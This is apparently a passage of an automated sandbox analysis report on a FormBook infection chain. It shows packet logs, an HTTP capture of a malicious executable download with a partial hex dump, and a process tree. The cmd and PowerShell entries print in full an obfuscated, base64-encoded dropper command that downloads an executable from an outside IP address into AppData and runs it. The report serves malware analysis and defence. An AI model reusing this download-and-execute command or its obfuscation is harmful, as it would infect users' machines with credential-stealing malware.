Dec 7, 2024 15:47:47.634219885 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.634239912 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.635021925 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.635070086 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.635094881 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.635107994 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.635128975 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.635145903 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:50.495925903 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:50.496053934 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:52.238116026 CET	49706	80	192.168.2.5	107.175.113.196

HTTP Request Dependency Graph

107.175.113.196

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	107.175.113.196	80	3472	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 15:47:44.369126081 CET	286	OUT	GET /400/win.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 107.175.113.196 Connection: Keep-Alive
Dec 7, 2024 15:47:45.492582083 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 14:47:44 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Wed, 04 Dec 2024 08:38:39 GMT ETag: "128400-6286db55d5857" Accept-Ranges: bytes Content-Length: 1213440 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 18 15 50 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 a2 09 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6r}r}r}4,"p}s}/A}/#}/"G}{@{}{PW}r}R)"}s}/s}r}Ts}s}Richr}PELPg"}@B@@@L\|ppq+pH@.text `.rdata@@.datatR@.rsrcp@@.relocqpr@B
Dec 7, 2024 15:47:45.492611885 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: DALhYC,YY9hcCY8hiCYhnCYM,hsCYhxCYQh}CYSL
Dec 7, 2024 15:47:45.492625952 CET	1236	IN	Data Raw: 7b 0c 00 7e 6a 8b 55 f4 8d 4b 14 8d 43 10 89 4d 08 89 45 0c 8b 38 0f b6 84 13 10 08 00 00 8b 09 89 4d e8 83 f8 10 0f 8f f4 a2 03 00 0f 84 cd a2 03 00 83 e8 08 74 5c 48 48 0f 84 86 a2 03 00 48 48 0f 84 37 a2 03 00 48 48 0f 84 cc a1 03 00 8b 7d f8 Data Ascii: {~jUKCME8Mt\HHHH7HH}EEMUEM;S\|[EMpWVE_^[]}}tWVE8t!EM9t9}ujWPVEUeSVW}3CEW](
Dec 7, 2024 15:47:45.492738962 CET	1236	IN	Data Raw: 00 00 3b c2 77 4c 0f 84 02 a0 03 00 83 f8 2b 0f 87 2b 01 00 00 0f 84 e7 9f 03 00 83 f8 06 0f 86 79 01 00 00 83 f8 0f 0f 84 a9 00 00 00 83 f8 07 0f 84 80 01 00 00 83 f8 20 0f 85 86 00 00 00 8b c7 c1 e8 10 50 0f b7 c7 50 53 56 e8 0f f9 ff ff eb 7d Data Ascii: ;wL++y PPSV};w)7;vv83jWSV+KwIQI {Ih>WSPVH_^[]VX33
Dec 7, 2024 15:47:45.492768049 CET	1236	IN	Data Raw: 84 0e 9d 03 00 83 be 9c 01 00 00 00 0f 85 18 9d 03 00 8d 45 cc 50 ff 33 ff 15 94 f6 48 00 8b 45 d4 8b 4d cc 2b c1 8b 55 d8 89 45 f4 8b 45 d0 2b d0 89 45 e8 8d 45 e4 50 ff 36 89 55 f0 89 4d e4 ff 15 70 f6 48 00 8b 7d e4 8b c7 0f af 45 f8 8b 75 e8 Data Ascii: EP3HEM+UEE+EEP6UMpH}EuM}fE}fEE}fEE}fft(Efu~E+;t'Ef`uE+
Dec 7, 2024 15:47:45.492813110 CET	1236	IN	Data Raw: ec 0c 8b 4d 08 8b ff 85 c0 74 1c 8b 10 39 0a 74 05 8b 40 04 eb f1 8b 4d 0c 01 4a 04 8b 00 8b 40 08 8b e5 5d c2 08 00 51 89 4d f4 c7 45 f8 01 00 00 00 ff 15 48 f1 48 00 89 45 fc b9 38 58 4c 00 8d 45 f4 50 e8 35 0f 00 00 8b 45 fc eb d3 55 8b ec 8b Data Ascii: Mt9t@MJ@]QMEHHE8XLEP5EUMtW}_]UQQSVW}EP7HElEpEPVpHME;tuc;xu[s5HsEE;\|}t\|;
Dec 7, 2024 15:47:45.492825985 CET	776	IN	Data Raw: 20 58 4c 00 e8 d2 0c 00 00 b9 0c 58 4c 00 e8 a9 0d 00 00 b9 f0 57 4c 00 e8 3a 31 00 00 a1 e0 57 4c 00 85 c0 0f 85 d3 98 03 00 5e c3 55 8b ec 83 ec 28 53 56 57 68 d0 01 00 00 e8 ca e5 01 00 59 85 c0 0f 84 41 02 00 00 8b c8 e8 2e e9 ff ff 8b f8 8b Data Ascii: XLXLWL:1WL^U(SVWhYA.XL}M9WLEPXL}XL]8XLpuE @#E E@ZEE EE}
Dec 7, 2024 15:47:45.492846966 CET	1236	IN	Data Raw: 11 83 ff 02 74 51 83 ff 03 74 43 7e 29 83 ff 05 7f 31 80 7e 38 00 75 56 57 51 ff 15 1c f7 48 00 83 ff 08 74 0d 83 ff 04 74 08 ff 75 0c e8 f0 1d 00 00 c6 46 38 01 33 c0 40 5e 5f 5d c2 08 00 33 c0 eb f7 83 ff 06 0f 84 0c 97 03 00 eb e8 c6 46 38 01 Data Ascii: tQtC~)1~8uVWQHttuF83@^_]3F8nF8RQHF83U}eXLt/UBw$XLu\T3@]3UQQ}2XLtt}7XLVW}0
Dec 7, 2024 15:47:45.493139982 CET	1236	IN	Data Raw: 75 08 e8 82 f6 ff ff 89 46 6c eb dd 55 8b ec 51 51 8d 45 fc b9 b0 57 4c 00 50 8d 45 f8 50 ff 75 08 e8 53 f4 ff ff 84 c0 74 4b 8b 4d fc a1 24 58 4c 00 57 8b 04 88 8b 38 80 bf 90 00 00 00 1b 75 38 53 8b 5d 0c 8d 43 ff 83 f8 17 77 30 0f b6 80 29 30 Data Ascii: uFlUQQEWLPEPuStKM$XLW8u8S]Cw0)0@$0@juuSW3@[_] 333I0@/@bCCCDC0@U@xRLV3XLjE0E+uEEu0HE
Dec 7, 2024 15:47:45.493155003 CET	1236	IN	Data Raw: f7 e3 57 0f 90 c1 f7 d9 0b c8 51 e8 49 d9 01 00 83 7e 04 00 8b f8 59 0f 85 87 9b 03 00 89 7e 04 5f eb a8 8b c1 eb d4 33 d2 eb b4 56 8b f1 57 33 ff c7 06 14 f9 48 00 39 7e 08 76 19 8b 46 04 ff 34 b8 e8 88 d9 01 00 8b 46 04 59 83 24 b8 00 47 3b 7e Data Ascii: WQI~Y~_3VW3H9~vF4FY$G;~rvfnY_^USVj[F9Fu0jX;sL3FWQ~Y)~_SYtMNFF^[]3VNVF4FYN^$
Dec 7, 2024 15:47:45.612596035 CET	1236	IN	Data Raw: 00 83 65 e8 00 83 c4 0c 33 c0 89 75 e0 40 89 45 ec 6a 00 50 8d 45 e0 50 53 e8 91 55 00 00 83 c4 10 8d 4d e0 e8 66 5f 00 00 33 ff 85 f6 7e 35 8d 45 f0 50 8d 4d e0 e8 1e 59 00 00 47 8d 45 e0 57 6a 01 50 53 e8 66 55 00 00 83 c4 10 8d 4d e0 e8 3b 5f Data Ascii: e3u@EjPEPSUMf_3~5EPMYGEWjPSfUM;_EPM?;\|MgM_MceMEWM?_^[]3GVW5 H3W5xRLWWjdh,PPhlHPPWW5xRLRLjPWWWWhPWhHW

Target ID:	0
Start time:	09:47:39
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\seemejkiss.hta"
Imagebase:	0xa60000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	1
Start time:	09:47:39
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	09:47:39
Start date:	07/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	09:47:40
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Imagebase:	0xe90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	09:47:42
Start date:	07/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline"
Imagebase:	0xc00000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	5
Start time:	09:47:43
Start date:	07/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3925.tmp" "c:\Users\user\AppData\Local\Temp\5zyziwbf\CSCADB73B4CC47C40A8804A92B1B0BD1E62.TMP"
Imagebase:	0x320000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	6
Start time:	09:47:50
Start date:	07/12/2024
Path:	C:\Users\user\AppData\Roaming\winnit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\winnit.exe"
Imagebase:	0xab0000
File size:	1'213'440 bytes
MD5 hash:	A97987DF137D1328F00AA6B81EBA4957
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	7
Start time:	09:47:50
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\winnit.exe"
Imagebase:	0x350000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2350161997.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2350750527.0000000003950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true